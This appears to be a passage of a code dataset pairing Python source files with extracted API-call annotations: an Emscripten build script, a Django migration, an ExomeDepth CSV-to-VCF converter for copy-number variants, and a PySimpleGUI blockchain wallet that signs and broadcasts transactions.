] | [((248, 287), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""PO1"""'], {}), "('PO1')\n", (280, 287), False, 'from example import stack\n'), ((288, 327), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME1"""'], {}), "('ME1')\n", (320, 327), False, 'from example import stack\n'), ((328, 367), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME2"""'], {}), "('ME2')\n", (360, 367), False, 'from example import stack\n'), ((368, 407), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME3"""'], {}), "('ME3')\n", (400, 407), False, 'from example import stack\n'), ((408, 447), 'example.stack.remove_metal_layer_by_name', 'stack.remove_metal_layer_by_name', (['"""ME4"""'], {}), "('ME4')\n", (440, 447), False, 'from example import stack\n'), ((769, 785), 'example.stack.simplify', 'stack.simplify', ([], {}), '()\n', (783, 785), False, 'from example import stack\n'), ((623, 682), 'example.stack.draw', 'stack.draw', (['"""example_ME5ME6_std"""'], {'pages': '(3)', 'single_page': '(True)'}), "('example_ME5ME6_std', pages=3, single_page=True)\n", (633, 682), False, 'from example import stack\n'), ((873, 928), 'example.stack.draw', 'stack.draw', (['"""example_ME5ME6"""'], {'pages': '(3)', 'single_page': '(True)'}), "('example_ME5ME6', pages=3, single_page=True)\n", (883, 928), False, 'from example import stack\n'), ((1242, 1296), 'example.stack.write_momentum_substrate', 'stack.write_momentum_substrate', (['"""example_ME5ME6"""', '(True)'], {}), "('example_ME5ME6', True)\n", (1272, 1296), False, 'from example import stack\n'), ((1545, 1592), 'example.stack.write_sonnet_technology', 'stack.write_sonnet_technology', (['"""example_ME5ME6"""'], {}), "('example_ME5ME6')\n", (1574, 1592), False, 'from example import stack\n')] |
#!/usr/bin/env python
import os
import stat
from sys import platform
from shutil import rmtree
from subprocess import check_call
def get_platform_type():
if platform == "linux" or platform == "linux2" or platform == "darwin":
return "unix"
elif platform == "win32":
return "windows"
else:
raise ValueError("Unknown platform.")
def resolve_path(rel_path):
return os.path.abspath(os.path.join(os.path.dirname(__file__), rel_path))
def makedirs_silent(root):
try:
os.makedirs(root)
except:
pass
if __name__ == "__main__":
platform_type = get_platform_type()
if platform_type == "unix":
build_dir = resolve_path("bin/web")
elif platform_type == "windows":
build_dir = resolve_path(".\\bin\\web")
makedirs_silent(build_dir)
os.chdir(build_dir)
if platform_type == "unix":
os.system("emcmake cmake ../.. -DEMSCRIPTEN=ON -G \"Unix Makefiles\"")
os.system("make")
elif platform_type == "windows":
os.system("emcmake cmake ../.. -DEMSCRIPTEN=ON -G \"NMake Makefiles\"")
os.system("nmake")
| [
"os.chdir",
"os.system",
"os.path.dirname",
"os.makedirs"
] | [((826, 845), 'os.chdir', 'os.chdir', (['build_dir'], {}), '(build_dir)\n', (834, 845), False, 'import os\n'), ((517, 534), 'os.makedirs', 'os.makedirs', (['root'], {}), '(root)\n', (528, 534), False, 'import os\n'), ((887, 955), 'os.system', 'os.system', (['"""emcmake cmake ../.. -DEMSCRIPTEN=ON -G "Unix Makefiles\\""""'], {}), '(\'emcmake cmake ../.. -DEMSCRIPTEN=ON -G "Unix Makefiles"\')\n', (896, 955), False, 'import os\n'), ((966, 983), 'os.system', 'os.system', (['"""make"""'], {}), "('make')\n", (975, 983), False, 'import os\n'), ((434, 459), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (449, 459), False, 'import os\n'), ((1029, 1098), 'os.system', 'os.system', (['"""emcmake cmake ../.. -DEMSCRIPTEN=ON -G "NMake Makefiles\\""""'], {}), '(\'emcmake cmake ../.. -DEMSCRIPTEN=ON -G "NMake Makefiles"\')\n', (1038, 1098), False, 'import os\n'), ((1109, 1127), 'os.system', 'os.system', (['"""nmake"""'], {}), "('nmake')\n", (1118, 1127), False, 'import os\n')] |
# Generated by Django 3.1.4 on 2021-02-28 15:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('parser_vacancies', '0004_auto_20210207_0052'),
]
operations = [
migrations.CreateModel(
name='Vacancies_count',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('data', models.DateField(null=True, unique=True)),
('added_today', models.IntegerField(null=True)),
('total_vacancies_count', models.IntegerField(null=True)),
],
),
]
| [
"django.db.models.DateField",
"django.db.models.IntegerField"
] | [((348, 402), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'primary_key': '(True)', 'serialize': '(False)'}), '(primary_key=True, serialize=False)\n', (367, 402), False, 'from django.db import migrations, models\n'), ((430, 470), 'django.db.models.DateField', 'models.DateField', ([], {'null': '(True)', 'unique': '(True)'}), '(null=True, unique=True)\n', (446, 470), False, 'from django.db import migrations, models\n'), ((505, 535), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (524, 535), False, 'from django.db import migrations, models\n'), ((580, 610), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (599, 610), False, 'from django.db import migrations, models\n')] |
#! /usr/bin/env python3
import sys
import os
import re
import subprocess
import argparse
import collections
import copy
import decimal
import vcf
import pysam
import pandas as pd
import settings
def cnv_locationtype(region, par1, par2):
chrom = str(region[0]).upper()
start = int(region[1])
stop = int(region[2])
if chrom == "X":
if start >= par1[0] and stop <= par1[1] or start >= par2[0] and stop <= par2[1]: #If CNV is nested in par1 or par2 region
return "chrXpar"
else:
return "chrX"
elif chrom == "Y":
return "chrY"
else:
return "auto"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('inputcsv', help='Full path to input CSV file')
parser.add_argument('refset', help='Used reference set ID')
parser.add_argument('model', help='Used model ID')
parser.add_argument('gender', choices=['male', 'female'], help='Used gender')
parser.add_argument('sampleid', help='sampleid name to be included in VCF')
parser.add_argument('template', help='Full path to template VCF')
parser.add_argument('runid', help='runid to be added to VCF metadata')
parser.add_argument('--vcf_filename_suffix', help='suffix to be included in VCF filename. Do not include spaces or underscores in suffix')
args = parser.parse_args()
vcf_reader = vcf.Reader(open(args.template, 'r'))
format_keys = vcf_reader.formats.keys()
record = vcf_reader.__next__() # First record (dummy for all other records)
new_record = copy.deepcopy(record)
new_record.samples[0].data = collections.namedtuple('CallData', format_keys) # For single sample VCF only!
format_vals = [record.samples[0].data[vx] for vx in range(len(format_keys))]
format_dict = dict(zip(format_keys, format_vals))
for f in ['GT', 'CCN', 'BF', 'RT', 'CR', 'RS', 'IH', 'CM', 'PD', 'TC']:
format_dict[f] = ""
new_vals = [format_dict[x] for x in format_keys]
new_record.samples[0].data = new_record.samples[0].data._make(new_vals)
df_csv = pd.read_csv(args.inputcsv)
vcf_reader.samples = [args.sampleid] # Change template sampleid in sampleid
"""Add reference and ED reference set metadata."""
vcf_reader.metadata['exomedepth_reference'] = [args.refset]
vcf_reader.metadata['calling_model'] = [args.model]
vcf_reader.metadata['gender_refset'] = [args.gender]
vcf_reader.metadata['reference'] = "file:{}".format(settings.reference_genome)
dx_track_git = subprocess.getoutput("git --git-dir={repo}/.git log --pretty=oneline --decorate -n 1".format(repo=settings.reffile_repo))
vcf_reader.metadata['track_repository'] = ["{0}:{1}".format(settings.reffile_repo, dx_track_git)]
vcf_reader.metadata['runid'] = [args.runid]
"""Open reference genome fasta file"""
reference_fasta = pysam.Fastafile(settings.reference_genome)
if args.vcf_filename_suffix:
vcf_output_filename = "{input}_{vcf_filename_suffix}.vcf".format(input=args.inputcsv[0:-4], vcf_filename_suffix=args.vcf_filename_suffix)
else:
vcf_output_filename = "{input}.vcf".format(input=args.inputcsv[0:-4])
with open(vcf_output_filename, 'w') as vcf_output_file:
vcf_writer = vcf.Writer(vcf_output_file, vcf_reader)
"""Determine percentage DEL/(DEL+DUP) for all calls in VCF."""
dels = 0
dups = 0
for index, row in df_csv.iterrows():
if row['type'] == "deletion":
dels += 1
elif row['type'] == "duplication":
dups += 1
perc_del = "%.2f" % ((float(dels) / (float(dels) + float(dups))) * 100)
total_calls = dels + dups
for index, row in df_csv.iterrows(): # index not used as we only use single sample VCF
"""Change record fields."""
new_record.CHROM = row['chromosome']
new_record.POS = row['start']
new_record.ID = "."
row_type = str(row['type'])
"""Include reference genome base"""
reference_base = reference_fasta.fetch(str(row['chromosome']), int(row['start']-1), int(row['start'])) # 0-based coordinates
new_record.REF = reference_base
"""Write type of call."""
if row_type == "duplication":
new_record.ALT = ["<DUP>"]
new_record.INFO['SVTYPE'] = "DUP"
elif row_type == "deletion":
new_record.ALT = ["<DEL>"]
new_record.INFO['SVTYPE'] = "DEL"
else:
new_record.ALT = ["NaN"]
new_record.INFO['SVTYPE'] = "NaN"
"""Add QUAL and Filter fields """
new_record.QUAL = "1000" # as STRING
new_record.FILTER = "PASS"
"""Determine genotype."""
ratio = row['reads.ratio']
if str(ratio) == "inf": #Rename infinitity values to 99
ratio = 99
"""Consider homozygous genotype only for deletion and with ratio <0.25."""
if row_type.lower() == "deletion" and float(ratio) < float(settings.ratio_threshold_del):
genotype = "1/1"
else: # Always het for duplication, and het for deletion if not < settings.ratio_threshold_del
genotype = "0/1"
"""Determine copy number. Note this will not work for mosaik events"""
par1 = settings.par1
par2 = settings.par2
normal_CN = settings.normal_CN
region = [str(row['chromosome']), int(row['start']), int(row['end'])]
locus_type = cnv_locationtype(region, par1, par2)
normal_copy = float(normal_CN[args.gender][locus_type])
calc_copynumber = normal_copy * float(ratio)
# Estimate true copynumber by rounding to nearest integer
copynumber = int(decimal.Decimal(calc_copynumber).quantize(decimal.Decimal('0'), rounding=decimal.ROUND_HALF_UP))
if args.gender == "female" and locus_type == "chrY":
"""In case CNV is detected on chrY in female, correct for this"""
print("WARNING: {sample} chromosome Y CNV detected (region = {region}) in female, calc_copynumber set to 0 (deletion call) or 1 (duplication call)".format(
sample = str(args.sampleid),
region = str("_".join(str(x) for x in region))
))
# CNV CN is set to 1, could also be >1 (but makes no biological sense)
if ratio > 1:
calc_copynumber = 1
genotype = "1/1"
else: # Assuming CNV is called by noise/mismapping/ on chrY, set CN to 0. Could result in masking contamination of male sample?
calc_copynumber = 0
genotype = "1/1"
else:
if row_type == "deletion" and calc_copynumber > normal_copy or row_type == "duplication" and calc_copynumber < normal_copy:
""" If calc_copynumber is opposite of expected CN for region, i.e. ratio 1.5 for a deletion"""
print("WARNING: {sample} CNV copynumber estimation {copynumber} does not match CNV type {rowtype} for region {region}".format(
sample = str(args.sampleid),
copynumber = str(float(calc_copynumber)),
rowtype = row_type,
region = str("_".join(str(x) for x in region))
))
"""Note: no correction here. should be bugfix in the ExomeDepth code"""
if copynumber == int(normal_copy):
""" Estimated copynumber is similar to copyneutral """
print("WARNING: {sample} true copynumber for region {region} is same as normal CN > set to -1 for deletion, +1 for duplication".format(
sample = str(args.sampleid),
region = str("_".join(str(x) for x in region))
))
if row_type == "deletion": # If deletion correct copynumber with -1
copynumber -= 1
if copynumber == 0:
genotype = "1/1"
elif row_type == "duplication": #If duplication correct copynumber with +1
copynumber += 1
"""Change INFO fields"""
new_record.INFO['END'] = row['end']
new_record.INFO['NTARGETS'] = row['nexons']
new_record.INFO['SVLEN'] = int(row['end']) - int(row['start']) # Input is assumed 0-based
new_record.INFO['CN'] = copynumber
call_conrad = row['Conrad.hg19']
if str(call_conrad) == "nan":
call_conrad = "NaN"
new_record.INFO['cCNV'] = call_conrad
"""Change FORMAT fields"""
for f in ['GT', 'CCN', 'BF', 'RT', 'CR', 'RS', 'IH', 'CM', 'PD', 'TC']:
format_dict[f] = ""
format_dict['GT'] = str(genotype)
format_dict['CCN'] = "%.2f" % (float(calc_copynumber))
format_dict['BF'] = "%.2f" % (float(row['BF']))
format_dict['RT'] = "%.2f" % (float(ratio))
format_dict['CR'] = "%.4f" % (float(row['correlation']))
format_dict['RS'] = row['refsize']
format_dict['IH'] = "NaN" # Inheritence is not build in yet
format_dict['CM'] = args.model
format_dict['PD'] = perc_del
format_dict['TC'] = total_calls
new_vals = [format_dict[x] for x in format_keys]
new_record.samples[0].data = new_record.samples[0].data._make(new_vals) # NOTE: GT must be first in order of metadata!
vcf_writer.write_record(new_record)
vcf_writer.flush()
reference_fasta.close()
| [
"pysam.Fastafile",
"collections.namedtuple",
"pandas.read_csv",
"argparse.ArgumentParser",
"decimal.Decimal",
"copy.deepcopy",
"vcf.Writer"
] | [((665, 690), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (688, 690), False, 'import argparse\n'), ((1564, 1585), 'copy.deepcopy', 'copy.deepcopy', (['record'], {}), '(record)\n', (1577, 1585), False, 'import copy\n'), ((1619, 1666), 'collections.namedtuple', 'collections.namedtuple', (['"""CallData"""', 'format_keys'], {}), "('CallData', format_keys)\n", (1641, 1666), False, 'import collections\n'), ((2080, 2106), 'pandas.read_csv', 'pd.read_csv', (['args.inputcsv'], {}), '(args.inputcsv)\n', (2091, 2106), True, 'import pandas as pd\n'), ((2865, 2907), 'pysam.Fastafile', 'pysam.Fastafile', (['settings.reference_genome'], {}), '(settings.reference_genome)\n', (2880, 2907), False, 'import pysam\n'), ((3258, 3297), 'vcf.Writer', 'vcf.Writer', (['vcf_output_file', 'vcf_reader'], {}), '(vcf_output_file, vcf_reader)\n', (3268, 3297), False, 'import vcf\n'), ((5945, 5965), 'decimal.Decimal', 'decimal.Decimal', (['"""0"""'], {}), "('0')\n", (5960, 5965), False, 'import decimal\n'), ((5903, 5935), 'decimal.Decimal', 'decimal.Decimal', (['calc_copynumber'], {}), '(calc_copynumber)\n', (5918, 5935), False, 'import decimal\n')] |
import binascii
import json
import os
import requests
from time import time
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from Crypto.Hash import RIPEMD160
from Crypto.Signature import pkcs1_15
import Validation
import PySimpleGUI as sg
import hashlib
class Wallet:
unix_time = time()
def __init__(self):
if not os.path.isfile('data/wallet.json'):
self.generate_wallet()
self.nodes = []
# GUI INIT
layout = [[sg.Text('Please enter the address/ip and port of a known node')],
[sg.InputText()],
[sg.Submit(), sg.Cancel()]]
window = sg.Window('Wallet waiting to connect...', layout)
event, values = window.read()
window.close()
# variable inits
self.node = values[0]
self.nodes.append(self.node)
sg.popup("Connecting to ", values[0])
# get the chain from the blockchain node
self.chain = self.get_chain()
#load our wallet file
wallet_file = json.load(open('data/wallet.json', 'r'))
self.private_key = RSA.import_key(wallet_file['private key'])
self.public_key = RSA.import_key(wallet_file['public key'])
self.public_key_hex = wallet_file['public key hex']
self.public_key_hash = wallet_file['public key hash']
# if wallet doesnt exist we'll generate one
if not os.path.exists('data'):
os.makedirs('data')
if not os.path.isfile('data/wallet.json'):
self.generate_wallet()
# wallet file functions
def generate_wallet(self):
private_key = RSA.generate(2048)
private_key_plain = private_key.export_key("PEM")
public_key_plain = private_key.publickey().export_key("PEM")
public_key = private_key.publickey().export_key("DER")
public_key_hex = binascii.hexlify(public_key).decode("utf-8")
public_key_hash = self.calculate_hash(self.calculate_hash(public_key_hex, hash_function="sha256"),
hash_function="ripemd160")
wallet_data = {
'private key': private_key_plain.decode(),
'public key': public_key_plain.decode(),
'public key hex': public_key_hex,
'public key hash': public_key_hash
}
self.write_json(wallet_data, 'w')
def write_json(self, data, mode, filename='data/wallet.json'):
# opens the file in write mode
with open(filename, mode) as file:
block_dict = json.dumps(data, indent=6)
file.write(block_dict)
# hash functions
@staticmethod
def hash(block):
# We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes
block_string = json.dumps(block, sort_keys=True).encode()
return hashlib.sha256(block_string).hexdigest()
def calculate_hash(self, data, hash_function):
data = bytearray(data, "utf-8")
if hash_function == "sha256":
h = SHA256.new()
h.update(data)
return h.hexdigest()
if hash_function == "ripemd160":
h = RIPEMD160.new()
h.update(data)
return h.hexdigest()
# functions for transactions
def new_transaction(self, recipient, amount, unix_time):
sender = self.public_key_hash
previous_block_hash = self.get_last_block_hash()
trans_data = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'time_submitted': unix_time,
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex
}
total_bytes = self.calculate_bytes(trans_data)
fee = self.calculate_fee(total_bytes)
total_amount = amount + fee
transaction = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'fee': fee,
'time_submitted': unix_time,
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex
}
hashed_trans = self.hash(transaction)
trans_with_hash = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'fee': fee,
'time_submitted': trans_data['time_submitted'],
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex,
'transaction_hash': hashed_trans
}
signed_trans = self.sign(trans_with_hash)
full_transaction = {
'sender': sender,
'recipient': recipient,
'amount': amount,
'fee': fee,
'time_submitted': trans_data['time_submitted'],
'previous_block_hash': previous_block_hash,
'public_key_hex': self.public_key_hex,
'transaction_hash': hashed_trans,
'signature': signed_trans
}
confirmation_window_layout = [
[sg.Text("Are you sure you want to send this Transaction?")],
[[sg.Text("Recipient", justification='left'), sg.Text(recipient, justification='right')]],
[[sg.Text("Amount to send: ", justification='left')], [sg.Text(amount, justification='right')]],
[[sg.Text("Transaction Fee: ", justification='left')], sg.Text(fee, justification='right')],
[[sg.Text("Total Amount: ", justification='left')], sg.Text(total_amount, justification='right')],
[[sg.Button('Confirm')], [sg.Button('Exit')]]
]
window = sg.Window('Python-blockchain Wallet', confirmation_window_layout)
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Exit'):
window.close()
return "cancelled"
if event in 'Confirm':
if self.broadcast_transaction(full_transaction):
self.chain = self.get_chain()
window.close()
return "confirmed"
else:
self.chain = self.get_chain()
window.close()
return False
def broadcast_transaction(self, transaction):
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
for node in self.nodes:
response = requests.post(f'http://{node}/transactions/new', json=transaction, headers=headers)
if response.status_code == 201:
return True
else:
return False
def sign_transaction_data(self, data):
transaction_bytes = json.dumps(data, sort_keys=True).encode('utf-8')
hash_object = SHA256.new(transaction_bytes)
signature = pkcs1_15.new(self.private_key).sign(hash_object)
return signature
def calculate_bytes(self, transaction):
tx_string = json.dumps(transaction)
tx_bytes = tx_string.encode('ascii')
return len(tx_bytes)
def calculate_fee(self, tx_bytes_length):
per_kb_fee = 0.25
sig_hash_bytes = 800
total = tx_bytes_length + sig_hash_bytes
return (total / 1000) * per_kb_fee
def sign(self, data):
signature_hex = binascii.hexlify(self.sign_transaction_data(data)).decode("utf-8")
return signature_hex
# functions for getting blockchain data
def get_balance(self):
chain_balance = Validation.enumerate_funds(self.public_key_hash, self.chain)
if chain_balance > 0:
return chain_balance
if chain_balance == False:
return 0
def get_block_height(self):
for node in self.nodes:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
return chain[length - 1]['index']
def get_last_block_hash(self):
for node in self.nodes:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
return chain[length - 1]['current_hash']
def get_chain(self):
for node in self.nodes:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
chain = response.json()['chain']
return chain
wallet = Wallet()
layout = [
[sg.Text('Welcome to the Python-blockchain wallet')],
[sg.Text('Your blockchain address'), sg.Text(wallet.public_key_hash)],
[sg.Text("Available Funds: "), sg.Text(wallet.get_balance(), key='-BALANCE-')],
[sg.Button('Update Blockchain'), sg.Button('Transaction History')],
[sg.Text("Address: "), sg.InputText(key='-ADDRESS-', size=(20, 20)), sg.Text("Amount: "),
sg.InputText(key='-AMOUNT-', size=(8, 20)), sg.Button('Send Transaction')],
[sg.Button('Exit')]
]
window = sg.Window('Python-blockchain Wallet', layout)
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Exit'):
break
if event in 'Update Blockchain':
wallet.chain = wallet.get_chain()
wallet.get_balance()
window['-BALANCE-'].update(wallet.get_balance())
if event in 'Transaction History':
window.close()
# code to find relevant transactions in the blockchain pertaining to our wallets address
chain = wallet.get_chain() # get the chain
sent = [] # list for storing sent transactions
received = [] # list for storing received transactions
for block in chain: # iterate through the blockchain
for transaction in block['transactions']:
# code to find received transactions
if transaction['recipient'] == wallet.public_key_hash:
print("received: ", transaction)
received.append(transaction)
# code to find sent transactions
if transaction['sender'] == wallet.public_key_hash:
print("sent: ", transaction)
sent.append(transaction)
else:
continue
sent_json = json.dumps(sent, indent=2)
received_json = json.dumps(received, indent=2)
transaction_window_layout = [
[sg.Text("Sent Transactions:")],
[sg.Multiline(sent_json, size=(100, 25))],
[sg.Text("Received Transactions:")],
[sg.Multiline(received_json, size=(100, 25))],
[sg.Button('Exit')]
]
transaction_window = sg.Window('Transaction History', transaction_window_layout)
events, values = transaction_window.read()
if event in 'Exit':
transaction_window.close()
if event in 'Send Transaction':
time = wallet.unix_time
recipient = values['-ADDRESS-']
amount = float(values['-AMOUNT-'])
if wallet.new_transaction(recipient, amount, time) == "confirmed":
sg.popup(
'Transaction submitted and accepted by network...\nPlease wait for next block confirmation for transaction to confirm')
continue
if wallet.new_transaction(recipient, amount, time) == "cancelled":
sg.popup("Transaction Cancelled")
else:
sg.popup(
'Transaction denied by network\nyou either have unconfirmed transactions in the mempool or insufficient balance.\nPlease try again')
window.close()
| [
"requests.post",
"binascii.hexlify",
"PySimpleGUI.Button",
"Crypto.Hash.RIPEMD160.new",
"Crypto.PublicKey.RSA.import_key",
"os.path.exists",
"json.dumps",
"Crypto.Signature.pkcs1_15.new",
"PySimpleGUI.InputText",
"hashlib.sha256",
"PySimpleGUI.popup",
"Validation.enumerate_funds",
"Crypto.Pu... | [((9040, 9085), 'PySimpleGUI.Window', 'sg.Window', (['"""Python-blockchain Wallet"""', 'layout'], {}), "('Python-blockchain Wallet', layout)\n", (9049, 9085), True, 'import PySimpleGUI as sg\n'), ((301, 307), 'time.time', 'time', ([], {}), '()\n', (305, 307), False, 'from time import time\n'), ((650, 699), 'PySimpleGUI.Window', 'sg.Window', (['"""Wallet waiting to connect..."""', 'layout'], {}), "('Wallet waiting to connect...', layout)\n", (659, 699), True, 'import PySimpleGUI as sg\n'), ((864, 901), 'PySimpleGUI.popup', 'sg.popup', (['"""Connecting to """', 'values[0]'], {}), "('Connecting to ', values[0])\n", (872, 901), True, 'import PySimpleGUI as sg\n'), ((1111, 1153), 'Crypto.PublicKey.RSA.import_key', 'RSA.import_key', (["wallet_file['private key']"], {}), "(wallet_file['private key'])\n", (1125, 1153), False, 'from Crypto.PublicKey import RSA\n'), ((1180, 1221), 'Crypto.PublicKey.RSA.import_key', 'RSA.import_key', (["wallet_file['public key']"], {}), "(wallet_file['public key'])\n", (1194, 1221), False, 'from Crypto.PublicKey import RSA\n'), ((1639, 1657), 'Crypto.PublicKey.RSA.generate', 'RSA.generate', (['(2048)'], {}), '(2048)\n', (1651, 1657), False, 'from Crypto.PublicKey import RSA\n'), ((5663, 5728), 'PySimpleGUI.Window', 'sg.Window', (['"""Python-blockchain Wallet"""', 'confirmation_window_layout'], {}), "('Python-blockchain Wallet', confirmation_window_layout)\n", (5672, 5728), True, 'import PySimpleGUI as sg\n'), ((6735, 6764), 'Crypto.Hash.SHA256.new', 'SHA256.new', (['transaction_bytes'], {}), '(transaction_bytes)\n', (6745, 6764), False, 'from Crypto.Hash import SHA256\n'), ((6924, 6947), 'json.dumps', 'json.dumps', (['transaction'], {}), '(transaction)\n', (6934, 6947), False, 'import json\n'), ((7461, 7521), 'Validation.enumerate_funds', 'Validation.enumerate_funds', (['self.public_key_hash', 'self.chain'], {}), '(self.public_key_hash, self.chain)\n', (7487, 7521), False, 'import Validation\n'), ((8545, 8595), 'PySimpleGUI.Text', 'sg.Text', (['"""Welcome to the Python-blockchain wallet"""'], {}), "('Welcome to the Python-blockchain wallet')\n", (8552, 8595), True, 'import PySimpleGUI as sg\n'), ((8603, 8637), 'PySimpleGUI.Text', 'sg.Text', (['"""Your blockchain address"""'], {}), "('Your blockchain address')\n", (8610, 8637), True, 'import PySimpleGUI as sg\n'), ((8639, 8670), 'PySimpleGUI.Text', 'sg.Text', (['wallet.public_key_hash'], {}), '(wallet.public_key_hash)\n', (8646, 8670), True, 'import PySimpleGUI as sg\n'), ((8678, 8706), 'PySimpleGUI.Text', 'sg.Text', (['"""Available Funds: """'], {}), "('Available Funds: ')\n", (8685, 8706), True, 'import PySimpleGUI as sg\n'), ((8762, 8792), 'PySimpleGUI.Button', 'sg.Button', (['"""Update Blockchain"""'], {}), "('Update Blockchain')\n", (8771, 8792), True, 'import PySimpleGUI as sg\n'), ((8794, 8826), 'PySimpleGUI.Button', 'sg.Button', (['"""Transaction History"""'], {}), "('Transaction History')\n", (8803, 8826), True, 'import PySimpleGUI as sg\n'), ((8834, 8854), 'PySimpleGUI.Text', 'sg.Text', (['"""Address: """'], {}), "('Address: ')\n", (8841, 8854), True, 'import PySimpleGUI as sg\n'), ((8856, 8900), 'PySimpleGUI.InputText', 'sg.InputText', ([], {'key': '"""-ADDRESS-"""', 'size': '(20, 20)'}), "(key='-ADDRESS-', size=(20, 20))\n", (8868, 8900), True, 'import PySimpleGUI as sg\n'), ((8902, 8921), 'PySimpleGUI.Text', 'sg.Text', (['"""Amount: """'], {}), "('Amount: ')\n", (8909, 8921), True, 'import PySimpleGUI as sg\n'), ((8928, 8970), 'PySimpleGUI.InputText', 'sg.InputText', ([], {'key': '"""-AMOUNT-"""', 'size': '(8, 20)'}), "(key='-AMOUNT-', size=(8, 20))\n", (8940, 8970), True, 'import PySimpleGUI as sg\n'), ((8972, 9001), 'PySimpleGUI.Button', 'sg.Button', (['"""Send Transaction"""'], {}), "('Send Transaction')\n", (8981, 9001), True, 'import PySimpleGUI as sg\n'), ((9009, 9026), 'PySimpleGUI.Button', 'sg.Button', (['"""Exit"""'], {}), "('Exit')\n", (9018, 9026), True, 'import PySimpleGUI as sg\n'), ((10310, 10336), 'json.dumps', 'json.dumps', (['sent'], {'indent': '(2)'}), '(sent, indent=2)\n', (10320, 10336), False, 'import json\n'), ((10361, 10391), 'json.dumps', 'json.dumps', (['received'], {'indent': '(2)'}), '(received, indent=2)\n', (10371, 10391), False, 'import json\n'), ((10711, 10770), 'PySimpleGUI.Window', 'sg.Window', (['"""Transaction History"""', 'transaction_window_layout'], {}), "('Transaction History', transaction_window_layout)\n", (10720, 10770), True, 'import PySimpleGUI as sg\n'), ((349, 383), 'os.path.isfile', 'os.path.isfile', (['"""data/wallet.json"""'], {}), "('data/wallet.json')\n", (363, 383), False, 'import os\n'), ((1412, 1434), 'os.path.exists', 'os.path.exists', (['"""data"""'], {}), "('data')\n", (1426, 1434), False, 'import os\n'), ((1448, 1467), 'os.makedirs', 'os.makedirs', (['"""data"""'], {}), "('data')\n", (1459, 1467), False, 'import os\n'), ((1484, 1518), 'os.path.isfile', 'os.path.isfile', (['"""data/wallet.json"""'], {}), "('data/wallet.json')\n", (1498, 1518), False, 'import os\n'), ((2551, 2577), 'json.dumps', 'json.dumps', (['data'], {'indent': '(6)'}), '(data, indent=6)\n', (2561, 2577), False, 'import json\n'), ((3037, 3049), 'Crypto.Hash.SHA256.new', 'SHA256.new', ([], {}), '()\n', (3047, 3049), False, 'from Crypto.Hash import SHA256\n'), ((3167, 3182), 'Crypto.Hash.RIPEMD160.new', 'RIPEMD160.new', ([], {}), '()\n', (3180, 3182), False, 'from Crypto.Hash import RIPEMD160\n'), ((6388, 6476), 'requests.post', 'requests.post', (['f"""http://{node}/transactions/new"""'], {'json': 'transaction', 'headers': 'headers'}), "(f'http://{node}/transactions/new', json=transaction, headers=\n headers)\n", (6401, 6476), False, 'import requests\n'), ((7730, 7766), 'requests.get', 'requests.get', (['f"""http://{node}/chain"""'], {}), "(f'http://{node}/chain')\n", (7742, 7766), False, 'import requests\n'), ((8054, 8090), 'requests.get', 'requests.get', (['f"""http://{node}/chain"""'], {}), "(f'http://{node}/chain')\n", (8066, 8090), False, 'import requests\n'), ((8359, 8395), 'requests.get', 'requests.get', (['f"""http://{node}/chain"""'], {}), "(f'http://{node}/chain')\n", (8371, 8395), False, 'import requests\n'), ((11128, 11269), 'PySimpleGUI.popup', 'sg.popup', (['"""Transaction submitted and accepted by network...\nPlease wait for next block confirmation for transaction to confirm"""'], {}), '(\n """Transaction submitted and accepted by network...\nPlease wait for next block confirmation for transaction to confirm"""\n )\n', (11136, 11269), True, 'import PySimpleGUI as sg\n'), ((11382, 11415), 'PySimpleGUI.popup', 'sg.popup', (['"""Transaction Cancelled"""'], {}), "('Transaction Cancelled')\n", (11390, 11415), True, 'import PySimpleGUI as sg\n'), ((11442, 11595), 'PySimpleGUI.popup', 'sg.popup', (['"""Transaction denied by network\nyou either have unconfirmed transactions in the mempool or insufficient balance.\nPlease try again"""'], {}), '(\n """Transaction denied by network\nyou either have unconfirmed transactions in the mempool or insufficient balance.\nPlease try again"""\n )\n', (11450, 11595), True, 'import PySimpleGUI as sg\n'), ((484, 547), 'PySimpleGUI.Text', 'sg.Text', (['"""Please enter the address/ip and port of a known node"""'], {}), "('Please enter the address/ip and port of a known node')\n", (491, 547), True, 'import PySimpleGUI as sg\n'), ((569, 583), 'PySimpleGUI.InputText', 'sg.InputText', ([], {}), '()\n', (581, 583), True, 'import PySimpleGUI as sg\n'), ((605, 616), 'PySimpleGUI.Submit', 'sg.Submit', ([], {}), '()\n', (614, 616), True, 'import PySimpleGUI as sg\n'), ((618, 629), 'PySimpleGUI.Cancel', 'sg.Cancel', ([], {}), '()\n', (627, 629), True, 'import PySimpleGUI as sg\n'), ((1873, 1901), 'binascii.hexlify', 'binascii.hexlify', (['public_key'], {}), '(public_key)\n', (1889, 1901), False, 'import binascii\n'), ((2792, 2825), 'json.dumps', 'json.dumps', (['block'], {'sort_keys': '(True)'}), '(block, sort_keys=True)\n', 